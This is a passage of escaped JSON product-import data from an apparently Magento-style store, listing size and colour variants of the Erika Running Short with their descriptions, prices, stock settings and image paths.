Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erika-running-short-29-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Red\"},\"1984\":{\"sku\":\"WSH12-30-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running Short-30-Green\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erika-running-short-30-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh12-green_alt1.jpg,\\/w\\/s\\/wsh12-green_back.jpg\",\"image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh12-green_alt1.jpg,\\/w\\/s\\/wsh12-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Green\"},\"1985\":{\"sku\":\"WSH12-30-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running Short-30-Purple\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erika-running-short-30-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Purple\"},\"1986\":{\"sku\":\"WSH12-30-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running Short-30-Red\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erika-running-short-30-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Red\"},\"1987\":{\"sku\":\"WSH12-31-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running Short-31-Green\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erika-running-short-31-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh12-green_alt1.jpg,\\/w\\/s\\/wsh12-green_back.jpg\",\"image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh12-green_alt1.jpg,\\/w\\/s\\/wsh12-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Green\"},\"1988\":{\"sku\":\"WSH12-31-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running Short-31-Purple\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erika-running-short-31-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Purple\"},\"1989\":{\"sku\":\"WSH12-31-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running Short-31-Red\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erika-running-short-31-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Red\"},\"1990\":{\"sku\":\"WSH12-32-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running Short-32-Green\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erika-running-short-32-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh12-green_alt1.jpg,\\/w\\/s\\/wsh12-green_back.jpg\",\"image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh12-green_alt1.jpg,\\/w\\/s\\/wsh12-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Green\"},\"1991\":{\"sku\":\"WSH12-32-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running Short-32-Purple\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erika-running-short-32-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Purple\"},\"1992\":{\"sku\":\"WSH12-32-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running 